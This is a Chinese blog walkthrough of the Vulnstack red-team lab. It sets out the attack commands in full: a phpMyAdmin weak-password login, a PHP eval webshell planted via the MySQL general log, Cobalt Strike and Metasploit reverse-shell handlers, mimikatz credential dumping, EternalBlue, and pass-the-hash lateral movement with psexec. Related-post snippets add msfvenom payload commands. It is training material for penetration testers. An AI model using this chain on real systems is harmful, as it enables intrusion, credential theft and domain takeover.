从WEB到内网横向&&CS后渗透&&MSF后渗透&&哈希传递------ATK&CK红队评估(一)

最新推荐文章于 2024-07-10 12:09:21 发布
最新推荐文章于 2024-07-10 12:09:21 发布
阅读量289 收藏
点赞数 1
文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/132514360
版权

ATK&CK红队评估(一)
环境下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

环境搭建

image.png
三台虚拟主机默认开机密码都是 hongrisec@2019
win2003和win2008可能会提示密码过期,自己修改即可。

网络拓扑

Network Diagram.png
win7服务器就是网关,要配置两张网卡,一张对外提供web服务,一张通向内网。
1.vmware中给win7添加一张网卡。
image.png
2.将网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)
image.png
3.将win2003、win2008 网络适配器设置成VMnet1仅主机模式(内网)。
image.png
登录查看三台主机ip。
win7:192.168.52.143(内)/192.168.126.188(外)
image.png
win2003:192.168.52.141
image.png
win2008:192.168.52.138
image.png
攻击机kali:192.168.126.130
用win7ping一下kali,看是否通。
image.png

在win7里找到phpstudy开启web服务。
image.png

信息收集

nmap端口扫描:
nmap --min-rate 10000 -p- 192.168.126.188
image.png
nmap -p 80,3306 -sV 192.168.126.188
image.png
可以看到目标开放了80,3306端口
80-http
3306-mysql
访问192.168.126.188:80
image.png
啥都没有,dirsearch扫一下目录。
dirsearch -u http://192.168.126.188
image.png

攻击尝试

主要是phpmyadmin。访问一下,尝试弱口令登录。
image.png
试了几次就成功登录了,root/root标准的弱口令,如果猜不出来直接上字典爆破。
image.png
在php探针中得知网站绝对路径C:/phpStudy/WWW
image.png

phpmyadmin后台getshell

最常用的就是into outfile写入木马了,当然还有利用Mysql日志文件getshell。

1.into outfile写入木马

已经知道了网站绝对路径,直接写入试试。
select '<?php eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/www/shell.php';
image.png
失败。应该是secure_file_priv的值为NULL,导致不被允许读取任何文件。可以查看一下:
show global variables like '%secure%';
image.png
果然是NULL,不允许into outfile方式写入木马,那就试一下日志文件getshell。

Mysql日志文件写入shell

查看日志状态:
show variables like '%general%';
image.png
general_log为off,MySQL不在写入日志,需要将它打开。打开后,操作都将记录在general_log_file指定的文件目录中。
SET GLOBAL general_log='on';
image.png
指定日志写入shell.php中
SET GLOBAL general_log_file='C:/phpStudy/www/shell.php';
image.png
再看一下日志状态:
show variables like '%general%';
image.png
现在直接把一句话木马写入shell.php中,只需要select一下木马,日志就会将它写入shell.php中:
SELECT '<?php eval($_POST["cmd"]);?>';
image.png
有了后门就直接试一下蚁剑链接。
image.png
image.png

内网渗透

cs植入后门

1.生成exe后门。
image.png
生成后的exe使用蚁剑进行上传到靶机
image.png
在蚁剑的shell中执行后门:
start artifact.exe
image.png
cs可以看到目标已经上线。
image.png
MS14-058提权:
image.png
成功提到system权限
image.png
先将心跳时间设置为3s,实战中不能过快。
image.png

信息收集

whoami
net start 
ipconfig /all   #查看本机ip,所在域
route print     #打印路由信息
net view        # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user        # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组
net view /domain         # 查看有几个域
net group 组名 /domain    # 查看域中某工作组
net user 用户名 /domain   # 获取指定域用户的信息
net group "domain admins" /domain  # 查看域管理员
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控
wmic useraccount get /all        #获取域内用户的详细信息

image.png
有god.org的域
shell net config Workstation
image.png
查看域信息:shell net view
image.png
查看主域信息:shell net view /domain
image.png
查询当前的登录域与用户信息:shell net config workstation
image.png
域控的域名即 owa.god.org ,用 ping 即可反查出域控ip为192.168.52.138
获取域内用户的详细信息:shell wmic useraccount get /all
image.png
mimikatz抓取hash和明文密码,然后查看密码凭证
image.png
用CS的hashdump去读内存密码,用mimakatz读注册表密码:logonpasswords
image.png
探测内网其他主机
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
image.png
信息收集结果:

域名:god.org
域内五个用户:Administrator、Guest、liukaifeng01、krbtgt、ligang
域内三台主机:OWA、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)
域控:OWA(192.168.52.138)
win7内网ip:192.168.52.143

CS 横向移动

通过net view看到还有两个域用户。OWA和ROOT-TVI862UBEH。
image.png
新建一个listener,payload设置为Beacon SMB:
image.png
已有的beacon上右键spawn生成会话,进行派生
image.png
image.png
成功后这里又会一个这样的标识。
image.png
回到target列表,又键非域控主机,使用psexec横向。
image.png
image.png
成功上线ROOT-TVI862UBEH
image.png
同理上线OWA
image.png
image.png
三台目标机器全部拿下。

MSF横向移动

1.msf开启监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.126.130
set lport 6666
run

cs创建一个listener
image.png
蚁剑上传木马到目标靶机然后执行。
image.png
检查主机是否运行在虚拟机上:
run post/windows/gather/checkvm
image.png
关掉主机杀毒软件:
run post/windows/manage/killav
获取目标详情:
sysinfo
image.png
配置静态路由
run post/multi/manage/autoroute #加载autoroute模块,探测当前机器所有网段信息
run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD #添加目标内网路由

2.扫描漏洞(ms17-010)

使用msf直接扫描域控win2008:

use auxiliary/scanner/portscan/tcp
set rhost 192.158.52.138
set ports 80,135-139,445,3306,3389
run

image.png

search ms17_010
use auxiliary/scanner/smb/smb_ms17-010
set rhosts 192.168.52.138
run

image.png
存在漏洞。
利用

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

失败。

哈希传递攻击(PTH)

hashdump
image.png
load kiwi
image.png
psexec|hash传递
探测445:

use auxiliary/scanner/smb/smb_version 
set rhost 192.168.52.138
set threads 40
run
set rhost 192.168.52.141
run

image.png
exploit/windows/smb/psexec模块哈希传递攻击 Windows Server 2008

use exploit/windows/smb/psexec
set rhosts 192.168.126.188
set SMBUser administrator 
set smbpass 00000000000000000000000000000000:NTLM值

成功

芝士土包鼠
关注
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1391
内网环境下的横向移动总结
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1253
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
MSF渗透
wo41ge的博客
11-24 3731
信息收集 获取目标机器的分区情况: post/windwos/gather/forensics/enum_drives 判断是否为虚拟机 post/windows/gather/checkvm 开启了哪些服务 :post/windwos/gather/enum_services 安装了哪些应用: post/windows/gather/enum_applications 查看共享: post/windows/gather/enum_shares 获取主机最近的系统操作: post/windows/gathe
MSF渗透操作
weixin_51583379的博客
11-03 1584
1.文件交互指令Linux权限理解chmod 777 {文件名.后缀}
内网渗透MSF渗透阶段常用操作笔记
最新发布
uuzeray的博客
07-10 814
1、先看下目标靶机已存在用户 meterpreter中输入:run post/windows/gather/enum_logged_on_users。6 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权。启动远程桌面协议:run post/windows/manage/enable_rdp。
msf渗透
舞动的獾
07-19 3671
主要内容 首先构造一个payload msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe 已经找到一台机器执行了我的payload 进一步获取更高的权限。 获取system权限 load priv getsystems 执行出现超时 先返回msf,保留session
msf渗透(Meterpreter命令)
2302_76986722的博客
09-17 503
6 ,获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权。kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用。filenname,path这两个也可以进行设置,比如名字改成qq.exe,就会qq在提权,更容易上。
横向渗透哈希传递(PTH)
qq_46258964的博客
05-08 2033
哈希传递PTH PTH,即Pass The Hash,通过找到与账号相关的密码散列值(通常是NTLM Hash)来进行攻击。 在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码。 因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。 kb2871997,禁止了本地管理员进行远程连接,从而组织了管理员权限执行wmi,psexec等危险命令, 但是这个补丁不知道为什么漏了一个默认(user SID=500)本
156-160.网络安全渗透测试—[Cobalt strike系列]—[域内渗透/信息收集/本地管理员/远程命令执行文件操作/Mimikatz/登录认证/自动化横向渗透/socks代理/中转监听器]
qwsn
04-02 1770
一、Cobalt Strike域内渗透 1 实验环境 1.1 实验拓扑 1.2 环境搭建 1.2.1 关闭各自域内防火墙 1.2.2 配置DC组策略:自动化让域用户加入到各自客户端的本地管理员组 1.2.3 DC组策略配置不当导致的权限问题:其他域用户获取本地管理员权限 1.2.4 WinRM 服务的配置不当导致的问题:在权限允许下可远程执行脚本命令 1.2.5 Win7虚拟机设置不休眠不关闭显示器:防止自动挂起导致的会话关闭 2 实验1:获取webserver跳板机会话+通过webserver的smb会话
[红日靶场]ATT&CK实战系列——红队实战(—)
Huamang的博客
10-17 898
环境搭建 靶场地址 该靶场给了三台虚拟机 下载好分别开启,密码都是hongrisec@2019,登录后需要修改密码,我这里修改的hongri@2019 靶场环境是这样的 web服务器由win7来搞,网络可以按照官方给的配置 但由于我习惯了用自己的windows打,所以我把win7设置成nat,另一个网络设成vm1 另外两个虚拟机的网络适配器都设置成vm1 NAT的子网是192.168.159.0/24 在win7里面的phpstudy打开服务 成功访问 以上就已经搭建好了环境了 WEB服务渗透 n
PC客户端(cs架构)渗透测试
06-19
PC客户端(cs架构)渗透测试,本项目主要针对pc客户端(cs架构)渗透测试,结合自身测试经验和网络资料形成checklist,如有任何问题,欢迎联系,期待大家贡献更多的技巧和案例。
147-针对某CS架构系统的渗透测试.pdf
09-20
147-针对某CS架构系统的渗透测试.pdf
MSF渗透攻击
weixin_43749601的博客
03-06 1756
进程迁移 刚获得shell时,该shell是极其脆弱和容易受到攻击的。所以第一步就是要移动这个shell,把它和目标机中的一个稳定的进程绑定在一块。 1.ps命令获取目标机正在运行的进程。 2.getpid获得shell的进程号(PID) 3.通过进程号得知该shell的进程名。 4.输入migrate + 被绑定进程的PID 5.再次输出getpid,发现进程号已经变成需要迁移的进程号,进程迁移成功 系统命令 shell连接稳定之后,开始收集系统信息 1.sysinfo命令查看目标机的系统信息 2.rou
MSF(六):后渗透
1stPeak's Blog
02-21 5125
渗透测试 安全牛学习Metasploit Framework笔记 一、已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二、基于已有session扩大战果 - msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444...
msf之后渗透(笔记)
p_utao的博客
09-14 2487
渗透攻击:信息收集 Metasploit提供了一个强大的后渗透工具——Meterpreter后期渗透模块有200多个。 Meterpreter优势: - 纯内存工作模式,不需要对磁盘进行任何写入操作 - 使用加密通信协议,可以同时与几个信道通信 - 在被攻击进程内工作,不需要创建新的进程 - 易于在多进程之间迁移 - 平台通用 进程迁移 获得shell时,该shell是极其脆弱,所以需要移动这个shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作,这样使渗透
超实用!手把手教你如何用MSF进行渗透测试!
dianyan5615的博客
06-15 1084
  在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升;后续需要对系统进行全面的分析,搞清楚系统的用途;如果目标处于一个内网环境中,那么我们就需要通过它对内网的其它终端进行信息收集和渗透测试,更全面地挖掘系统中存在的安全隐患。   本期安仔课堂,ISEC实验室的向老师为大家介绍如何使用MSF进...
MSF渗透模块Meterpreter
LainWith的博客
01-27 4367
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
Kali利用msf渗透Windows电脑(超详细)
jennycisp的博客
02-27 2820
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值